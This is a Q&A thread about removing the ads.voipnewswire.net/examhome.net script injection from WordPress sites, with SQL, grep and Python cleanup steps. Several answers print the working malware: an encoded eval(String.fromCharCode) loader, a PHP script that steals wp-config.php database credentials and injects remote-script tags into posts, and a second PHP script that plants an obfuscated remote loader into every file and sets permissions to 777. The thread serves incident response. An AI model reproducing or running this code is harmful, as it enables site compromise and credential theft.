How do I remove a script injected into my WordPress site: ads.voipnewswire.net?

Time: 2018-09-11 18:58:34

Tags: wordpress ads malware

This script is all over my WordPress site. I have removed many of the scripts, but it still redirects to some malware ads.

Does anyone know how to fix this?

The script has this link: ads.voipnewswire.net

5 answers:

Answer 0 (score: 8)

This morning I had the same problem on two sites. After a lot of investigation of my files and database, I found that the malware's behaviour was to modify my js files by adding an encoded script, and to append another script to the end of every post in the wp_posts table of my database.

I basically solved it in two steps:

First: go to your database (MySQL) with phpMyAdmin or any client and run:

    UPDATE `wp_posts` SET post_content = REPLACE (post_content, "<script src='https://cdn.examhome.net/cdn.js?ver=1.0.5' type='text/javascript'></script>", " ")

What this does is remove every occurrence of the malware injection from the table.

Note: the "?ver=1.0.5" part of the search may change. Check your page source (Ctrl+U) as the page starts to load, before the redirect, and search for "cdn.examhome.net" or "ads.voipnewswire.net" or "eval(String.fromCharCode...", then check the version of the malware js so you can change it in the database query above.

Second: go to the file manager and compress all files as a zip or similar. Download the archive and extract it on your computer, use Notepad++ (Sublime Text etc. can help, but I recommend Notepad++) and use its advanced search on that directory to replace the following with blank/empty in all documents:

[Image: how the replacement looks in Notepad++ (in Spanish)]

eval(String.fromCharCode(118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 49, 49, 53, 44, 32, 52, 54, 44, 32, 49, 49, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 57, 44, 32, 49, 49, 53, 44, 32, 49, 49, 57, 44, 32, 49, 48, 53, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 53, 44, 32, 49, 49, 
50, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 57, 44, 32, 49, 49, 53, 44, 32, 49, 49, 57, 44, 32, 49, 48, 53, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59, 32, 125));

Note: the numbers inside may change, but they always start with eval(String.fromCharCode(. Don't worry, neither WordPress core js nor plugin js uses it, so you can search for any match and copy the numbers from it to complete the replace statement.

Then zip it again, delete everything in public_html, upload the archive again and extract it into the public_html root.

With all this, both of my WordPress sites returned to normal. I hope it helps you. Good luck!
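As an added example (not code from this answer or from WordPress), a small Python helper that covers both steps above: it decodes the eval(String.fromCharCode(...)) loader so you can see which URL it loads, flags the hostnames named on this page in a file or post body, and strips the injected tag whatever its ?ver= value is. The sample post body and js file are constructed to mirror the injection shape described here; the hostnames in them are the ones this page names.

```python
import re

# Hostnames the answers on this page name as the injection sources.
KNOWN_HOSTS = ("cdn.examhome.net", "ads.voipnewswire.net", "s2.voipnewswire.net")
FROMCHARCODE = re.compile(r"String\.fromCharCode\(([0-9,\s]*)\)")
INJECTED_TAG = re.compile(
    r"<script[^>]*src=['\"]https?://(?:cdn\.examhome\.net|[a-z0-9.-]*voipnewswire\.net)"
    r"[^'\"]*['\"][^>]*>\s*</script>", re.IGNORECASE)
INJECTED_EVAL = re.compile(r"eval\(String\.fromCharCode\([0-9,\s]*\)\);?")

def decode_fromcharcode(text, max_rounds=5):
    """Replace each String.fromCharCode(n, n, ...) call with the string it builds; repeats
    because the loader nests a second call (holding the script URL) inside the first."""
    for _ in range(max_rounds):
        new = FROMCHARCODE.sub(
            lambda m: "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()), text)
        if new == text:
            break
        text = new
    return text

def find_indicators(content):
    """Sorted indicators in one file or post body: the eval marker, any known host,
    and URLs that only become visible after decoding."""
    decoded = decode_fromcharcode(content)
    found = set()
    if "eval(String.fromCharCode(" in content:
        found.add("eval(String.fromCharCode(")
    found.update(h for h in KNOWN_HOSTS if h in decoded)
    for url in re.findall(r"https?://[^\s'\";<>)]+", decoded):
        if url not in content:
            found.add("hidden:" + url)
    return sorted(found)

def strip_injection(content):
    """Remove the injected <script src=...> tag (whatever its ?ver= value) and the
    eval(String.fromCharCode(...)) loader; everything else is left as is."""
    return INJECTED_EVAL.sub("", INJECTED_TAG.sub("", content))

def _fromcharcode(s):  # builds a String.fromCharCode(...) literal, for sample data only
    return "String.fromCharCode(" + ", ".join(str(ord(c)) for c in s) + ")"

# Constructed samples: a post body carrying the tag from answer 0, and a js file
# carrying a nested loader shaped like the one quoted there.
SAMPLE_POST = ("<p>Hello world</p>\n<script src='https://cdn.examhome.net/cdn.js?ver=1.0.5'"
               " type='text/javascript'></script>")
SAMPLE_JS = "jQuery(document).ready(function(){});\n" + "eval(" + _fromcharcode(
    "var elem=document.createElement('script');elem.src="
    + _fromcharcode("https://ads.voipnewswire.net/ad.js") + ";document.head.appendChild(elem);") + ")"
```

Run find_indicators over a wp_posts export or the unzipped files before doing any bulk replace, and keep the untouched copy until the site is confirmed clean.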

Answer 1 (score: 1)

I helped a friend with this problem and, doing my best to help the community with my experience of this nasty malware in WordPress files, I found that in my case the malware had been injected into a folder under /wp-content/uploads/ as files without an extension.

I found two files (php files):

The first file exposes "wp-config.php" with all the keys and database details and injects the examhome.net script into the post_content table. The code is below.

    <?php echo ":#009009#:";
    $file_to_search = "wp-config.php";

    // Walks up to five directories above DOCUMENT_ROOT, so it reaches the
    // wp-config.php of any site on the same host, not just this one.
    @search_file($_SERVER['DOCUMENT_ROOT']."/../../../../..",$file_to_search);
    @search_file($_SERVER['DOCUMENT_ROOT']."/../../../..",$file_to_search);
    @search_file($_SERVER['DOCUMENT_ROOT']."/../../..",$file_to_search);
    @search_file($_SERVER['DOCUMENT_ROOT']."/../..",$file_to_search);
    @search_file($_SERVER['DOCUMENT_ROOT']."/..",$file_to_search);
    @search_file($_SERVER['DOCUMENT_ROOT'],$file_to_search);

    function search_file($dir,$file_to_search){
        $files = scandir($dir);
        foreach($files as $key => $value){
            $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
            if(!is_dir($path)) {
                if (strpos($value,$file_to_search) !== false) {
                    show_sitenames($path);
                }
            } else if($value != "." && $value != "..") {
                search_file($path, $file_to_search);
            }
        }
    }

    echo ":#009009#:";

    function show_sitenames($file){
        $content = @file_get_contents($file);
        if(strpos($content, "DB_NAME") !== false) {
            // Pulls the database credentials straight out of wp-config.php
            $db = get_var_reg("'DB_NAME'.*?,.*?['|\"](.*?)['|\"]",$content);
            $host = get_var_reg("'DB_HOST'.*?,.*?['|\"](.*?)['|\"]",$content);
            $user = get_var_reg("'DB_USER'.*?,.*?['|\"](.*?)['|\"]",$content);
            $pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\"](.*?)['|\"]",$content);

            // Create connection
            $conn = new mysqli($host, $user, $pass);

            // Check connection
            if ($conn->connect_error) {
                echo $conn->connect_error;
            } else {
                // Every table in every schema whose name contains "post"
                $q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%post%'";
                $result = $conn->query($q);
                if ($result->num_rows > 0) {
                    while($row = $result->fetch_assoc()) {
                        $q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]."  LIMIT 1 ";
                        $result2 = $conn->query($q2);
                        if ($result2->num_rows > 0) {
                            while($row2 = $result2->fetch_assoc()) {
                                $val = $row2['post_content'];
                                if(strpos($val, "examhome") === false){
                                    echo "nothing:".$file."\n";
                                    // Appends the loader tag to every post that does not carry it yet
                                    $q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,\"<script src='https://cdn.examhome.net/cdn.js?ver=1.0.88' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%examhome%'";
                                    $conn->query($q3);
                                } else {
                                    echo "already exist:".$file."\n";
                                }
                            }
                        } else {
                        }
                    }
                } else {
                }
                $conn->close();
            }
        }
    }

    function get_var_reg($pat,$text) {
        if ($c = preg_match_all ("/".$pat."/is", $text, $matches))
        {
            return $matches[1][0];
        }
        return "";
    }

    exit();

The second file, when executed, recursively injects the code below (a js script) into the "head" section of js files. The script also changes the file permissions to 777, meaning readable and writable.

At this stage your system is already compromised, no matter how many times you remove the script from the files, because they have full access to the system: the "wp-config.php" details have been compromised, meaning they now have access to your wp-admin.

<?php $a = 'find / -type f -name "*" | xargs grep -rl "<head"';
$l1 = '<script language=javascript>var _0xfcc4=["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x61\x73\x79\x6E\x63","\x69\x64","\x63\x64\x6E\x37\x38\x39","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x6C\x65\x6E\x67\x74\x68"];var url=String[_0xfcc4[0]](104, 116, 116, 112, 115, 58, 47, 47, 119, 119, 119, 46, 108, 101, 97, 114, 110, 105, 110, 103, 116, 111, 111, 108, 107, 105, 116, 46, 99, 108, 117, 98, 47, 108, 105, 110, 107, 46, 112, 104, 112, 63, 118, 101, 114, 61, 49);var get_text=function httpGet(_0x3bc1x4){var _0x3bc1x5= new XMLHttpRequest();_0x3bc1x5[_0xfcc4[2]](_0xfcc4[1],_0x3bc1x4,false);_0x3bc1x5[_0xfcc4[3]](null);return _0x3bc1x5[_0xfcc4[4]]};var text=get_text(url);if(text!= String[_0xfcc4[0]](110,117,108,108)&& text[_0xfcc4[5]](String[_0xfcc4[0]](104,116,116,112,115,58,47,47))>  -1){var a=function(){var _0x3bc1x8=document[_0xfcc4[6]](String[_0xfcc4[0]](115,99,114,105,112,116));_0x3bc1x8[_0xfcc4[7]]= String[_0xfcc4[0]](116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);_0x3bc1x8[_0xfcc4[8]]= true;_0x3bc1x8[_0xfcc4[9]]= _0xfcc4[10];_0x3bc1x8[_0xfcc4[11]]= text;document[_0xfcc4[13]](String[_0xfcc4[0]](104,101,97,100))[0][_0xfcc4[12]](_0x3bc1x8)};var scrpts=document[_0xfcc4[13]](_0xfcc4[14]);var n=true;for(var i=scrpts[_0xfcc4[15]];i--;){if(scrpts[i][_0xfcc4[9]]== _0xfcc4[10]){n= false}};if(n== true){a()}}</script>';



$t = shell_exec($a);
$t = explode("\n", trim($t));
foreach($t as $f){

$g = file_get_contents($f);
if (strpos($g, '0xfcc4') !== false) {
   echo "e:".$f;
} else {
$g = file_get_contents($f);
$g = str_replace("<head>","<head>".$l1,$g);
$g = str_replace("</head>",$l1."</head>",$g);
@system("chmod 777 ".$f);
@file_put_contents($f,$g);
$g = file_get_contents($f);
if (strpos($g, '0xfcc4') !== false) {
   echo $f;
} 
}
}
echo ":#009009#:";

Importantly, do not use the Duplicator plugin, as it seems to have a SQL injection hole; if it is on your system, remove it. You can use the grep command to identify infected files, as follows:

  • sudo grep -rl "examhome.net" /var/www/html/ | more

  • sudo grep -r "eval(String.fromCharCode(118,97" /var/www/html/ | more

  • Finally, with the grep and sed commands you can identify the infected code and replace it with whitespace.

I really hope this helps others with this problem, but it is not a final solution, because this malware worm is being updated and I am still investigating the issue.

Dave

Disclaimer: use the information in this post at your own risk!

Answer 2 (score: 0)

You can take this approach, but be careful:

First back up the WordPress database, then open that backup.sql file in any code editor (Notepad++ etc.), search in it for "https://s2.voipnewswire.net/s2.js\' type=\'text/javascript\'>" and replace all occurrences with a space; that solves the problem.

Now the malicious script is removed from all of your WordPress site content, and you can do the same for the other site files.

Answer 3 (score: 0)

The most common problem is an injection into the wp_options table that looks like

    eval(String.fromCharCode(118, 97, 114, 32, 100,

So, to find it, first export the database, open it in an editor and search for the string "eval(String.fromCharCode(118,97,114,32,100,". The next step is to delete the rows containing that string from the database; most likely you will find it in the wp_options table.

Answer 4 (score: 0)

My WordPress cache (wp-content/cache/page_enhanced/) keeps generating the home page and other pages with someone else's insecure script.

For example:

Can those files be injected when viewing the page source?